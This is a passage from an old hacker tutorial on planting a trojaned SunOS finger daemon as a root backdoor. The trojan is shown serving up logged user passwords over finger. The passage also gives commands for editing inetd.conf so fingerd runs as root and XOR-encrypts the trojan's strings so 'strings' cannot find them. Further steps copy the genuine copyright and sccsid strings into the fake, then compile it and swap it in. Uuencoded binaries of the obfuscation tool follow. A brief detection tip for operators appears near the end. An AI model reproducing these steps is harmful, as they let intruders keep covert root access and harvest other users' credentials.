  9212.  
  9213. Well done! You have gained a root access.
  9214. (...)
  9215. # cat /etc/passwd
  9216. root:EXAMPLE PASSWORD:0:1:Operator:/:/bin/csh
  9217. nobody:*:65534:65534::/:
  9218. daemon:*:1:1::/:
  9219. sys:*:2:2::/:/bin/csh
  9220. bin:*:3:3::/bin:
  9221. uucp:*:4:8::/var/spool/uucppublic:
  9222. news:*:6:6::/var/spool/news:/bin/csh
  9223. ingres:*:7:7::/usr/ingres:/bin/csh
  9224. audit:*:9:9::/etc/security/audit:/bin/csh
  9225. sync::1:1::/:/bin/sync
  9226. ftp:*:995:995:Anonymous FTP account:/home/ftp:/bin/csh
  9227. +::0:0:::
  9228. hit::0:0::/:/bin/csh
  9229. ^^^ they run NIS... anyway our local root login will work fine
  9230.  
  9231. <example>
  9232. #finger hit@hacked.system.com
  9233. [hacked.system.com]
  9234. here is the log
  9235. user: xit001 from: hell.com ip: 666.666.666.666 has pw: xit001
  9236. user: yit001 from: (...)
  9237.  
  9238. That's really useful to collect logfiles without logging in and leave
  9239. tracks everywhere.
  9240.  
  9241.  
  9242. Now the problem....
  9243. If you want to use the fingerd to run world accessible commands you won't
  9244. have any problem but if you require root privileges check this out:
  9245.  
  9246. #grep fingerd /etc/inetd.conf
  9247. finger  stream  tcp     nowait  nobody  /usr/etc/in.fingerd     in.fingerd
  9248.                                 ^^^^^^
  9249. On SunOs 4.x.x the fingerd runs as nobody, the fake user (used with
  9250. NFS etc..), as nobody of course you cannot modify the passwd, so edit the
  9251. file
  9252.  
  9253. finger  stream  tcp     nowait   root   /usr/etc/in.fingerd     in.fingerd
  9254.  
  9255. now you have to refesh the inetd process
  9256.  
  9257. #kill -HUP <inetd pid>
  9258.  
  9259. now you can do what you want, many unix clones let the fingerd running as
  9260. root by default...  and even if you have to modify the inetd.conf an
  9261. operator unlikely will realize what is appening since all other daemons
  9262. run as root.
  9263.  
  9264.  
  9265. Why have I crypted all data?
  9266. #strings login
  9267. (...)
  9268. Yeah d00dz! That's a //\/\eg/+\Backd0[+]r by MASTER(...) of MEGA(...)
  9269.  
  9270. Lame or not?  All alien data must be crypted..  a fast exor crypting
  9271. routine will work fine, of course you can use the standard crypt function
  9272. or other (slow) algorithms but since security is not important (we just
  9273. want to make our texts invisible) I suggest using my fast algo,to create
  9274. the exor matrix simply put all texts on a file and use the little
  9275. ExorCrypt utility I have included UUencoded below (amiga/msdos version).
  9276.  
  9277. <example amiga>
  9278. echo > test "this is a test"
  9279. Acrypt test test.o
  9280. line crypted: 1
  9281. type test.o
  9282. static char exor[]={
  9283. 213,201,200,210,129,200,210,129,192,129,213,196,210,213,161};
  9284.  
  9285. char *ExorCrypt(ch)
  9286. char *ch;
  9287. {
  9288.    char *b;
  9289.    b=ch;
  9290.    while ((*(ch++)^=0xa1)!=0x00);
  9291.    return(b);
  9292. }
  9293.  
  9294. The utility will create the exor vector (matrix) (from the 80 column
  9295. formatted ascii input text) and the specific decoding function, If you do
  9296. not supply a key "$a1" will be used, remember to add a NewLine if
  9297. necessary, the vector/matrix never contain them.
  9298.  
  9299. Before compiling the whole thing you must add the copyright and sccsid
  9300. strings I have not included (they may vary).
  9301. Let's simply do:  (SunOs)
  9302.  
  9303. #strings /usr/etc/in.fingerd
  9304. @(#) Copyright (c) 1983 Regents of the University of California.
  9305.  All rights reserved.                       ^^^^ COPYRIGHT STRING
  9306. @(#)in.fingerd.c 1.6 88/11/28 SMI           <<<< SCCSID STRING
  9307. getpeername
  9308. finger
  9309. pipe
  9310. /usr/ucb/finger
  9311. No local finger program found
  9312. fork
  9313. fdopen
  9314. %s:
  9315.          (((((
  9316. DDDDDDDDDD
  9317. AAAAAA
  9318. BBBBBB
  9319.  
  9320. The top of source becomes:
  9321. static char copyright[]=
  9322. "@(#) Copyright (c) 1983 Regents of the University of California.\n\
  9323.  All rights reserverd.\n";
  9324. static char sccsid[]="@(#)in.fingerd.c 1.6 88/11/28 SMI"
  9325.  
  9326. That's all. Now you can compile and install your fingerd trojan,
  9327. the source was adapted for SunOS but you can port it on many unix
  9328. clones without troubles.
  9329.  
  9330.  
  9331. Few final words to:
  9332.  
  9333. Operators: How to defeat this trojan? First of all check the inetd.conf,
  9334.            then do VARIOUS fingerd checksums (maybe even the "sum" command
  9335.            is a trojan :) if you discover the trojan wrap the finger port
  9336.            so you can track down the hacker (usually all wtmp/lastlog logs
  9337.            are removed) or wrap everything modifying the daemons, do NOT use
  9338.            the inetd.conf_jump_new_daemon scheme, if you can, add a fingerd
  9339.            tripwire entry to prevent future installations.
  9340.            Well...  if the hacker is a good one everything is useless.
  9341.  
  9342. Beginners: You must be root to install the trojan, remember to get a copy
  9343.            of the original fingerd program before installing the fake
  9344.            version.
  9345.  
  9346.            On a Sun do:
  9347.            #cc -o in.fingerd trojan.c
  9348.            #mv /usr/etc/in.fingerd fingerd.old
  9349.            #mv in.fingerd /usr/etc
  9350.            remember to check the /etc/inetd.conf
  9351. -=- + -
  9352.  
  9353. To get in touch with me send E-Mail to:
  9354.  
  9355.  Internet: hit@bix.com           X.25: QSD Nua (0)208057040540
  9356.                                            Mbx: Hitman_Italy
  9357.  
  9358. if you want, use my PGP key
  9359.  
  9360. -----BEGIN PGP PUBLIC KEY BLOCK-----
  9361. Version: 2.3a.2
  9362.  
  9363. mQCNAiypAuIAAAEEALVTvHLl4zthwydN+3oydNj7woyoKBpi1wBYnKJ4OGFa/KT3
  9364. faERV90ifxTS73Ec9pYhS/GSIRUVuOGwahx2UD0HIDgXnoceRamhE1/A9FySImJe
  9365. KMc85+nvDuZ0THMbx/W+DDHJMR1Rp2nBzVPMGEjixon02nE/5xrNm/sb/cUdAAUR
  9366. tBpIaXRtYW4gSXRhbHkgPGhpdEBiaXguY29tPg==
  9367. =bCu4
  9368. -----END PGP PUBLIC KEY BLOCK-----
  9369.  
  9370.  
  9371. ExorCrypt Amiga version:
  9372.  
  9373. -=) S.Encode v2.5 (=-
  9374. begin 777 Acrypt.lha
  9375. M'$0M;&@U+;L7``"`*```4K>9`0``!D%C<GEP=`X]$UF#^]?>]8TV]?OWWGY]h
  9376. MWCGT)T<>==;,3^G7FQMOA\XXX4Q2S[GS9)QP]W.-A<]))-Y@SN9!MOMPPCA"h
  9377. MGWF(`+"*XDE5UEU4LU45L4CDCA958FA%94*5RX4P217"J%868`=M85QPS1@<h
  9378. M/?_]_O>YL*2RW3+[;9:U9+);_%OP`;\%'W=VLD<;;A%.>^3?Y5SVH19P?5/Zh
  9379. MA=_F.G`BP"T_^)W7<CS.<^82-**GE,*TW![K%:RX-^2U1'6@U$A:NB8*U937h
  9380. MBE!+)^,'6%']'I^Q4:\OJ+4\;SRP91%+1U^]](EG3(`+-1#G.A;DI5HUY8/%h
  9381. MQ>+BO[DGWM>O[7KH5F%/_)J-.MI>)@6C,25:,JPVNG]?$U3,3P5R0K:L^W@=h
  9382. MEOB)!6NV&@<KLM^2#I]EZ:!9]U^%KH/Y$+.,$5^!WI)SH2__MHSQ<$Q67WZ_h
  9383. M]!=Z-*LN>_%J(:U9"*!#14E`E3\&Z=7*(;^G(JBO6IX_HM;9_4DB51P!LV<Yh
  9384. MHK^Z,?HY3SE;M$/07)+EYB+H9]>+=3G/1<E`J+DEEM+'PUM''PWGJ2R861")h
  9385. M:$2(*R)2R(<?>Q\.AX9DQ?@4@?ZL8O.Q@3651OX(#*P$?'._'O:/P&Q@]RCLh
  9386. MJNZ6KH^QEW#'J6'1)]+!5_@XU1#=7,K'C[&XO=A5W6NU<RWF>$4?5-,_>QYSh
  9387. MH:TNP?Q>8[K:N$7ETUZ7F;0HGH-<FDVA?UM,RYS@,W;J6MP&;VCBW1%'PYS*h
  9388. MJ_(%&M&B[:)_3'PZ396<@5V(54-#X=%R;.0"/O),^+,:OG,6+?D\&%LTX7<Ch
  9389. M"KC"\"SD54-KH1F4X?=C#^6YAZ>SD&+9,`8E['P^SV]M(I(;3,8DXGT1B=DWh
  9390. MB:/IV<B$\%.SBW;0)31U<C])/8S,K/6FY;L>P6MC$N-A#9M[[8H\ECV):F_9h
  9391. MDD7XP"^&WA9^R/V*_NPM"UT(^'\CW995;,(H0$?R,[5^)FB'Y/#`A@2R`)QQh
  9392. M]Y#=J^\JVD:IE_H6L??,WEP^T+3/I]M1;U\/H27*$H`SRQB<`:/]T]0VGH-<h
  9393. MA[Z`31[!KD`J8N1@?SN#N2>!!?>0Q0.7.0Y<V3F;QV-W+(Q+"(7O/<O4[[8)h
  9394. M2R1H6N3:'KUT+WHN$'\!O<*E"YC2S=PT,$]I[,D.K5G#9O"4>=4J=%^,PO+)h
  9395. M%VUT+7S2>GO5%.99=?0A7];^/\Q*=G'):7X<^R>[6,Z$W;\O#"9^ILY#\T1\h
  9396. M=L$]??_O)*I1MDE?;__\253/MZ_H8?ZR2J0'+FFS22M[1NJ/-):I3N84DDMHh
  9397. MNI<U;=S_!RTY_<,%T\@6NB<M>(*>C<I\(4X[E/U13[MRG@BGW[E/RQ3NG*?Th
  9398. MFQ+5LBSV3EF=/ZKE.^%/SG*=R![%2E#G3-^H$[2Y]G(8>IJX@J\NSD67N67(h
  9399. MC]]'V(6+V,?8A;>L"V]$%M\]!##J$[CX?\/BVS:P:TMIC1+U)3A3DI\#+JQ/h
  9400. MM'?S_FGN6$ZA3T*I2MFN=>I(,67LH\FJB=LO<>\@Q&W^EV\7F3CX"-\C41J*h
  9401. M3EVN[\;^R"OM2S])&W4JMM<%7/W="BZ5H;#&)2HTZM"AV^;0/XZ'9^XMTK/Ph
  9402. ME(^&OVYH*L>L=>+?M-"Q@V<A#JR]Q?$FBV7;ADOQXO,Z^L`OL=H5?S0CO%:Rh
  9403. M0*W<H)/RZ7@$%P>'GZ0%9=S*+OJ_7D6[PO#?+R>?'Z3Y8K@-R[,K\>:,I8\Th
  9404. M!;`>50F'DP+8P2Q&.G3T1T]-S6L?9NXVXU]"A:9U^)@5_1+$XN)0;VU\3&V]h
  9405. MKN&.7$T+7-8H\W'PE@CCRH^'UU_9R!F^4:H?3Y-M(X[+!-=_:;E)"Z+XR%DUh
  9406. MVYZQ20L-1W=:DA9-4_[LJOU<JZRV\KT\G-*&ZQ@4'FO<AKA&@O6=I6]K7=MHh
  9407. MOEZ/^*OL+'3=P"H@I_"B\S0&4_O8%Z3&U+:%LPP##>%#72F%55[65?-541K)h
  9408. MK^:UQ`UM]X?<L6O)'W&&]>'&[&5$&A>Q26W1I+7E)+7\I@WK"!YH2JAY>EH3h
  9409. M+7M5&,[M%&'FS48=`2J-9=IO&,,9^LPE)+JTWE)7M=*74X78R7R+0;Q6@?0Jh
  9410. MK-K*&#SH*[E0IZ/AO0XO_NQ!D:L9&FM-Y\6-R7,;DIQK]S&W0QKQ(Q]X7Z\Rh
  9411. MY%=6TWCZD,I8VKD2ZSOH>O)74[[PR2A>2Q:Q@E:DT(U,8K8>=J:':E^:':G?h
  9412. ME>CR]+8C:ONI195C:%KWI3V;HE#YAYFTS<,W3R8I8AD"9.XWH-8P51T+#R,Zh
  9413. M'NJ85EH&A>("EN@T+QMLR*,[MF92X99\,?>2&!../O##4'9I>1XH;HY,9GP'h
  9414. M4Q0!')%7%&9R?'9B\TE6N%>U82;X;^+[7!85G^-:LW'12QOZ0P?".Y85?8EKh
  9415. M@7'1,"F#>*!&9Y4G5-4^S;0%&Y>X_?MD)%ZO]^#%_ERI\QR^RRK$ZSY)BL.;h
  9416. M4[5SGMM[5-/<#FL:Z4W;\M<6^3_T'Z&:'Q]OYBOQ"/";$<NVPM"UD22Z?`"$h
  9417. M_$#&NVMI`4YPIH1?V=5IVN')7"^?'//F%7&;O-:X8L>2WIO7U/IXE[3)@/T2h
  9418. MU#]YNDS.:&$?%8="&_(O%-[^"]Y6^9NE[X@JGE,+>-Z#64"UZ*U!>[NB2]-Xh
  9419. M;ZBA$V,R?1]Z-+^Z+W*NXK9O0W(FV^,FWG_CM_]@:B>#<'DN.)]4UE1>8H:_h
  9420. M^?"_[^J&%:RL_1C2=<EJ:_PI^2M:>(Q1PIY*O[RW+I'!UF_OZ,I:!#8]DV08h
  9421. M8_^0`WZP#+)AD!?(B\SLZT!>"]P0QH1.X8B(MR%AT82DI[,S@\NICP+!K!8Wh
  9422. M&#$6Y1!G</E,VF#.X=?CSOW^+B0(LM^%V0O#`W@OWAU91XW)C=C)>AUF'&KJh
  9423. M"!KY42D8^JG!T3@??)#[PP^G(\D9%5AT,.34R,!#)='&WL+&*:B+.\!-GM*_h
  9424. MHJ0+#'G67_&;_UN].,Y1KB@`6T\*G):+=3K(&MX9`:\\2NF/1YT%,<*F/5L1h
  9425. M]LIBPC]XHHZD>[/E,^1ZYQQ8)GD".'_&#+Y#^'\I,?OM3B,^>Q4N`'\)@$>^h
  9426. M$8%"/OV7!#-D,]3M5D.RALJ8&"M#315%&*0+&S.+6<;!5M@Q-)AT<JVR5643h
  9427. M!5>GAPX[AJKRS\U::ZHHU,L_-FFN)454#'L<JHBK0(4&=X`^X<?#]_*./)Z_h
  9428. M!LN;9;=KCF=O67MYI.TK(0^=K6UD+1B3UJ2_X_2[>%/!`E<2W=!*>KU0@=:2h
  9429. M2>I=%"@SF1'PY[T;:1H(9+#Z^$?N\EO1))W`@;:'074YD%02_?X/GD$SQ?O1h
  9430. M]7IOYLV!_;_!&_'B\R$^$'?7`4Z.G=R^TQ!DY3H`4E0Q`)V5'\[$L2BLQ<2"h
  9431. M1Z)$!3MQ;JC1>S;#<QK@8$H0A1N-VH]M($AB]7_04Z5(D"U(IJ%2!M?G4514h
  9432. M#\K'`T%>(BU<ZIY^U\\GH@[=>2QOJ]!IR6S'U<^W!VB%74MR:M#?4H4#5G\3h
  9433. M>@95M+:$FREA2I]]#L,.V@)W\QYP,"3GIBHC!=FIOA)[YX,T03'*@-PR[%',h
  9434. M4%W=M-=2[<AL]J-9ER,S6=H8AE66I&HTA6FZNIWV_+KGXE58V!KW@U&5N73]h
  9435. M&SD6@Q?Z]FN84E,]M6AO=;>^>1M?<B5,&R714<JT<B31H\VJ[C"O'&@=&&2^h
  9436. M/=UHNS=DMW^C-<<:_^!NNZIQCZ(XFV2\#-7X)E&%P<48_(%^^;P?^%.YOM40h
  9437. M5+6&S)7;-&P]P_0&AW0JK-FE&JZ"`I8[;01#CTW"TKS";-J=Z=$;A?:"*0F6h
  9438. M957_V<'X-Z9P9=8E&,XQ=[+:]5E*::J%A%9\\U*>N>&DV(X<XQ^@ZR0=7-SKh
  9439. MR)YY+FB^I;)P-)*H$E)I)3T-<TPXOP"##2ECHCQ;FQY^6H$<Z`<#^@:]?`]>h
  9440. MW-+?+^FE+?99J6ZA!N;)!]S2G7C,WG=]7;^T+//D.GI\*/1RJM/OKI-:"#KWh
  9441. M=!U<.&\IB/U(4\$OZLWEI>:V6DQ&7UD.AY^F--A&V3'%R14@-?09IMUK)R1+h
  9442. MW'@.F].QMQ)FFMW%Z;G-XB=L637A86T&F&KW#,RZU)*:$8$$I3?NDK8F3="=h
  9443. M5S_Q:K7/5/3'`1@QJ9*\&'(,'WT&"I[<;N-?6(=1<3F,U^.M#J:Q<HT[*HUYh
  9444. MTE9-!FV\*L7$H'UP<QVO<,<,Y1_G;,P>7ZI/]/"IX?74T7PA6H!#.L]64;0;h
  9445. MUM]`U$:?E#@'WT_7XZO-7K"47(.GPB??(\?;,+'1H,`/9^,E\ZMU0^&;?0$Kh
  9446. M&8'0'T<`;#IT1G((W\,%?-E=T+O]1[6((+GH;_=:Q6"[0Z1&FP_9ST\2LN22h
  9447. M'\0TG47H3=73FXOC8B%S&;;:<X\]S4\X-3F]!QT3QM=1Q0JYY<:3Y[^1,$G#h
  9448. MUU<ZKRK)_@AMOD(SC[\OWO7D]&(^WO]#<"_UL>_)6O)VWC^7N_\L?FR4-OJ]h
  9449. M9<:V3-S]A^DEJT\[U\_TGW'QMW)R49Q_U]M@/OR[[Z"<_@?KTW=.A$`Z&Q9/h
  9450. M4;W>YNHYHQ&[^^/D06R#OXLP2>L)5Z^*JE.AYT(D&XKZB6&DKN?>CDOKQ[`4h
  9451. MY6![.V]G`]EECEO>P/`V.!`[)"]JR`"NC`WOT(^QA.P9U>TP745#M%TZL7V)h
  9452. M4175C5]D<(B:0)-H&A@;$&#J-0ZL8HA<1PJ^S:]8-N9AY,:;@NHHEM2$_RW"h
  9453. MEXPAHSXX.NC;J\2[1+V9:_`9N%:LD._G,U9*]RUEP+L:%'WB_@]S!4QK#'4Yh
  9454. M--W0A^<@('\]$\.4SWJ-0;;'BX@M<=^((/[OKZQ]`WE+W)+0;MKGP?$#+V_^h
  9455. M[Z\FC@VL#Z)XE^7L[JEK^I>]W]S%N%_K@.C0<?[F+)@QO(#PNU^WBZR;:Z/Wh
  9456. M//)8[7[?M27B*@"T5Z;QAF\_5:AKGU5VUCM8U-:B&'O`DCST>)$\<Q_+(<%Vh
  9457. MRV@'FJ=J&TW>FMG"=FS;Z>4?!QKL_Y\&V]PNIP;>?S>##7>_Z\&&"M\MS@3]h
  9458. M(`?VXCKVAS/;VJNG5PUD[.<P\%3V[J?1.ML#XV$E0W<,8R`Q#PMQ)>RZ)R"Ih
  9459. M)2IFX4XKF-Z!/I2Z^A#:D17-5M!#@X[7.8731YS7.;AG<3!4Q_3W2[L<,&(:h
  9460. M,<TWEU8YQP<$>[F3F)@);%JRGJ?8BQPEZZ@N[3<AS70S1J7J#+B_G"!W]V`2h
  9461. M\E4*9N-H/,^<9,W?V+.13DQI1=YR30Q;^<YJ;6Q.UC;?P%E_P%G#NY5&WEZ@h
  9462. M3F[JXS,[BIPX(K*T0TK?^S@8F`'+M3&V^OIH1E;?30BZR3+*!3G<RQY"<W-+h
  9463. MJO`W-+8ACB9>\CJGI;>1E6TUTZL@E/00+5^:4Z[G->U=-&8QO&Q0J/9C[9!"h
  9464. M<C/_UYP]=$#]YZI</^\!_Z:&B></_.A`%/,[SN];TSU#_F^AR&W":55Z"6]_h
  9465. M(R;]]P9Z1P#DQI-!W)+Z;'&F?`$4^'1?C8M-NXWCR51(W^<2TIT_%N_WE+J`h
  9466. MGK@J<:2M4:A3C!\F]0NE-'X8J<VXYB]*XYS"OF?L7'TQK<V@(3#-8/"W5W6Xh
  9467. M6ZDO46L#=FK&B>8O$PN^ZF+X6!K:%&HXOX(&['2M^12B-!<P-E`U`5CWZ';^h
  9468. M"KWO$P+426;ONSIGQ+<$K/<H=?.9@DKW#67"=!5?HMDYE3YJ:Q\/I?1J]T'\h
  9469. MHY:<<$J27%_467;9QF7%JMMI!LVT[73R`9[;!DZ)N`'E9V;!@\]@`NC3R7[Dh
  9470. M(/*3!&_D986\H/O]`'])L!9L?"Y"$NI>6<?R-*NVX$/IIBV[1E)XUY?]K<@Nh
  9471. MWR$8.6@#]Z&OK`:C]Z?-*W:>:+TQ\T7&.'+G^M#EKGR//O\(X<NR]Q9GXVTKh
  9472. M`;2][F-I?K1\/(X=7O&]J^_X@;4L9K:E+$_H'G^YQU,@%/>QDR0:3&BO)?B+h
  9473. MM?C8O`,M\9N(OST#>2^S'6%ZA\GK!0RUT(Y8'0GTA99U(;R,P-Y#C*NN&F]&h
  9474. M$?Z*4N?(RJ;ZVD5,%6VVJ@?<]K?D]AEJY3P>;>2]V8F"ZE+&VTW4RJWPO?Y'h
  9475. M(H&G(W\XPO@FP['N9*B)R9%P!J=["&5P%6]$]'C&7>"(V_?N24I<2-MP9^'Qh
  9476. M&0A&J;+>&=KNQ:K2U30W$TV20.3@#^E\0#\7J`-2K)B+F9U0\Z4,=B!#5ZP%h
  9477. MC]0"F3_N.MH=@[.M\;%I8I]6^%$Z"E[@L]2^`:+XJO1]7.)W;;`OW>V9#N&Bh
  9478. M0\S62KA8\\$2TPM]//6NZ@NXVYU]=:^<F)I\!N)II<V)I!@^?1@P:9(^4]M=h
  9479. MRB=H<28\P\"3BQ.QW^Z3J=9%B;!-ZXQW3#GT#BD[Z:I/[VCLY`V&KM2"CM%$h
  9480. M9E4"9S/.S8TF/A]#\XZMM*A<Z.DW,@XDMW4;<R<Q:DUBS>9N)!USDW'3N"M$h
  9481. MV6U$X+N4KXYD=#S/8,K82KQ37=Y_$3&=XC>K_EF$\\<4&%WX`:EP)1M6]H;Rh
  9482. MU^[@3U,Z<X,'B-D%DYT^QY'!8O9<Z;JTV^Z^.V"__AQPZ7V]3U076&"T3MJRh
  9483. M`>ZIB<!_`"4YRK>:#Z%L'N/'Z%QX^)-F31"2%H$+<3<L9U^[OBV68`Q'9Y?^h
  9484. M^QUO4^+8_XO^=C_*3+KFZ'S`/=)`\]`=S>(1,LLF?S`&JX^Y53T;/"<77RQQh
  9485. ME9@O-`\!L#WW3<`^#5D.E/>/W8I_9&?I@(T\3R8C.[^,1NP(]NY$A_$(YS$^h
  9486. M,1O6Q&_GAY]7_P2B0_2X;S!#W[^:0?CCL5TQ@K6%"'=3NK:3/CN@1V5[;W%/h
  9487. M="VPY+&Z6TKZG::L.:UA9O-:S;6)VR^$.:APJB*K='QR(^B]#!D^I%W<Q/85h
  9488. MJWQMTYRN%V)8O)>B*[P3TW4U*+6^M]9KT2-EK9DFZO?!14CBMM-;:?4D6NO+h
  9489. M[8ZZ^UU[>9G=_]9]G6%`*F4BQ(MAPN#ZV)B<'V["+$B1.)M@BJ]C[$<U"19^h
  9490. MQ9C8`]O;'`MQ)[6(DCQ[HK%DZ/4N75B',L)6+7UR@:SOXL.+7Q8E<<-ZZV_!h
  9491. MK%8L.N)/N)6JP`2^%.;)\]KR9N!?_E\GNK![7KD=/\WD_RBFA-/E>3JK",?5h
  9492. MTNO[_)M;"N+E^:>G>7YT6P9X.B*L5KIR+7\+@[W;#%KVMAQ,"XZ<PJV<BV',h
  9493. M]6+#X-?3=E`;,OY47F=K6[5):\^"URY`[]=,$N#%^E-,7$[:_])ODRSY,<.Ph
  9494. M_/+!E608HX/*9@0X-2'2NYDK0:HO+#%NN?NAR8.^@+[*>FL&T=S:;I"])OR>h
  9495. M+^D+T!F`O334(^(<BKF(-[GK(-GBP???@Z^E_4??C#Z.UY5PHGV@\)TH9@HMh
  9496. M66X>=,BKPW#^ZK8:V8BOU=[,OD6FM_GV.MV%]K;A*`=A(CZG3Q]5IB*OB2+3h
  9497. M4E4C&1)FMM]?I$?&@R<DN<#.;2,M+U(G.G2UIG`Z-*F9'.8IB?<OG6T@Z^;$h
  9498. M^I@KV9LQ7+(U38VZU[_@'(UYY#OJ2->=FU>*)Y\0=^<2KF4V%S4`+?A9^L<)h
  9499. M3T_8$2#NCKQFW.:$K$CL/5H$?>N0-[UM1GG9-M(-;F&-$V_J-@^LK08FV$V;h
  9500. M1/P[_#OM`87P!.KT[^$4&!"$(N)H,"?S`5=[-9=IX#-\Y&7T)Q'_Z<.FACCTh
  9501. M\LZ>1]@='OETUW-A(9S'-MJ;;$C[!,):MJRSF2/OYQ0^"D[SM+O37][,L)GAh
  9502. M2[ZD[RLNT;+M*NL1J_"12=YVO:W<777UW;WB-/?6]UX0L.TNWA:JUK^YTVD1h
  9503. M2[!&ET]Y+V-\B3KKK6]NC2R-C?9M7O+"]N-;WPXY&86FF3+V9I$7USK4:[,Qh
  9504. MZ-=L$7E[?(V5O=:ZX>%X/5PM[F@CX<-U<+K`(/AOMA?6]]KM8C67-O,1K1M/h
  9505. MO.^^;X;PJ78$5*%CJ7807B?(J_/^9^W&TMQWQ_?],F*0\H/-O"3EJG,)S3ZRh
  9506. MYJ!B6[767(P1`#$A#8?J=7\QNKJ_FIO!1\&Y/;]/3U(S5555'?_-K+^EOZCLh
  9507. MQZK*RH<QLS6WVQF7E/JTU_GC[=:Z\&^3&&MN`8(;S.QV'6LC_4_^?0-I?B3_h
  9508. M[NA`)6N+_W\8K6)IH>LZ/_4_)LUA_3^1M0,6/AL_I9F'S,V_VG[,VG5OUNM9h
  9509. MO_J?LP[_[#86F_J<_R/B_17W6_;?,_.6&`G\I^W\W?[9/Y7]OX[U'_\?MDO)h
  9510. ?Q@O.N$_Y(^\0??-'T%W5;-PEAFKB#[MVT,U,B:P[`/^#h
  9511. `h
  9512. end
  9513.  
  9514. ExorCrypt MSdos version:
  9515.  
  9516. -=) S.Encode v2.5 (=-
  9517. begin 777 MScrypt.zip
  9518. M4$L#!`H````&`%*WF6F[C95"R!T``/TM```+````35-C<GEP="YE>&4/`!(#h
  9519. M)!4V)S@Y:GM,G6X?"08!$S3E]I;WFVKM'_`B0((`00(D#?#___$"`2*,NY'Zh
  9520. M@.L];'M`@`H!RA7XK=G5@`_0T[*U$?!_P8"'K;J8/6ZY`-&G-&CUZG&C^IXCh
  9521. M7A[QQHTZ#CW8+\&!?`T4.T&_(G$+%@@5/?.$@XD+7.S5X/^;N$4Y>R]G)S@3h
  9522. M&/(1"UP[;FC2;>M=@>A]8&MBH_Y'`J]+$;>T=)^$K[@TM^3-$TA6>^HD0?03h
  9523. MU&E^ZAR?NJ-11^]2E[ZU+@IV;A"]?P_1CBBK2_X'T.X>!XROHQW=J%W_V_6/h
  9524. M&PKSC8V"@O[J!^@-6#U=C_^H'#0GU2]J3W_'E_=K<-%QRLM?[QP2V.L/2'=@h
  9525. M^NL`<?,<@$]3'B&5)2MN*=%%/7_TEQ$D;6<VX6=*EQ+M_M%'V=H1L`VK;FLWh
  9526. M@*?A]4GM$;^>(*2ZMY?-7=2M!?W_S_&\'[/'"E"17S=V"GJ@4_N+L\,\J/B`h
  9527. MDNWLK>2MD-;7D+>AN:+C:O@](P+TBX%:<6LABI:((&Q\?81K#N::UG_@VM.Yh
  9528. MO2(K,>O)6-/CK'G0@)"67CZ0:->/6XV7R=HB]C(O<T/J-.X#7@8K9RY'L/;Xh
  9529. MUO8!3HU/Z/4C\6M\?GE\`'2&K=]!*NP+\___)/,^*N"-\Y7`[(MO_C]HG.!>h
  9530. MV'LQ3>7K&Y3MN/>,P1$-V0F`B1[P)=QAAR\!3$5?(O6'^!*(CHI,RS?P)?"4h
  9531. MKFGM!KY$$9GL>P%-.*9O6M>WKJ\(R1KW9$V/LN<!_T/&;0J:E@3M!'&C8J8+h
  9532. M,7-?S#0>9JZ,F5[#S)TQTUZ8.3=F.@JSE(V;FZ9[E"V^,P%F#J.=:V"F1S#+h
  9533. MYFA="'Q0#]6C=R*MZQU">E88S^[C6;]Z75R^ZW"`M&$V#\E3X%R!S4'^=G.$h
  9534. M;=3"5]X/[!\@1+D#?1&OW_'UP,2='MP_%Z+%C^@["H`-!77V_YG$/YB\?YN)h
  9535. M32(%0.Q$!G_CL0E.!X_4YFBA``?>3R2T,QZ^TOO][;25G&^3L<?<`"T>Y/_;h
  9536. M8\'<4`^N?";T\U4M[<$'=':L?I+L/\YL_]^FMLW;)K9AMZ:HL]XG]OT!#L>Eh
  9537. MU(ZQXUIXVSQNT"C`L@5.U:SO'$#+$[09V*=9@=:MUSV(%:K-_Q;5`'I2LN.-h
  9538. M%)F/WI48`ZQQ?&*/IX+:8&J`#C\X7U)W6@+1F?UBAW8%CG?IV`!3FQCS+`$6h
  9539. M-XA7(&/M,[<-O4<Z>[[`]^F_!K1!/1]JWU6W5<MT[;2#]L?;=!Q\YG^3@'L"h
  9540. MI,LR-T.`OC4#G&^:[L+<__\T>?FNZV9<7]Z@QP-A?_^W<("L,4=F[0_7#HA4h
  9541. MM?A[0&<H`P1\BOI?1DUDJ.4JM"\<,-V"@!]!#W1IWO.^`0O\)9QD#@"9[$3Gh
  9542. MC1M4M['R[-CLOH46_"4\^D3<S)=&#QB`G4D":YZM`'%:4#8W"P"99+.G=0-<h
  9543. MH/<2[16M=1?TLJ7R!2J[^+"G"(":TS40MIS=8T^0EN";E/C!76VHS>JQN,53h
  9544. M??(2UG\$[),<^70;>@1=SDQ;-)?%IG7XSOMS%3Y]NKCA>/O_HZ^7YZP.![\Gh
  9545. MN+C@PJ("Z<K_WW&]^V$+7_FEAO_!Q7VR`]K4,N.\H.C;"D!=Q87VZ6WZS[J8h
  9546. M^TIL2GJG1W<@/?_'_P\?98BG__"Z6YUI/U?O+9,\?]8RP8O?#YA^%:!:O/_Ch
  9547. M#N!OJ)>Q>QW^V`!HK&OH<5HH_>FFT`(CGL7INW<`09^I>4!@:`DQX?U'CR;Vh
  9548. MR1W`%FKV^]$71_^EO^_``!T1CK/F"9+N?IX)Z=[GV9#N6P5H>NU1)]**3MK)h
  9549. M23L7:<?*4R1=DCRY3(*%KB<_,WD0[Y37)VT*)SD_?7'PZ.DG1D=%F2M?'P#?h
  9550. MX%\![R>Z71<\S0X>_#9XM/3UEQ0OJN+L!UX_&OT<\4(!B_>_4OQBXJ-D^\78h
  9551. M!^[CK`;SGT.'%K=1UZQ537U=?6^Y#;C$],/RJNJ"KS/*_P4`[@/7YX4DS_[Bh
  9552. MV[C]FE,NQBGWLK>?<$I5_05M$#87VGQ]M.*@ZO@YS8M@OIB0N8MY5P'NM^8Ih
  9553. M(</,T]GF24OSVLPI0_+'#VQ^BC6\G<&KF"7TI?G%Z1?G3W*9NM`^78B.C:76h
  9554. M/CBZ#9T0+A*%]1>]#)2D_\7]HY<?X+A_O/H[P>,<&>#7Q<^B'X@_L0M=3[=Vh
  9555. M[(WW3SI^8F">.X=\UHG]`BQ:!$FT^/:)G82:=^D]:=M&6NHOMDK0-U."K7<*h
  9556. M,WN@ENDRO"15J<]V\_7K+3TR%RX`*[V"RGWTE_]S+`<I>;$^<L+Q3L+:AIA(h
  9557. MM`)I`]'LO]#3BZ$/--#(RZV9TT#A/+=DP0>W>W3LL0=.1\\X^Z(Q^\KE`X,[h
  9558. MNJVQ1;)BE0N1)'PDJNR5%[N(/Z"%X;`_GI[K?KD3SBXMG8M/=L8($(LR/S!Rh
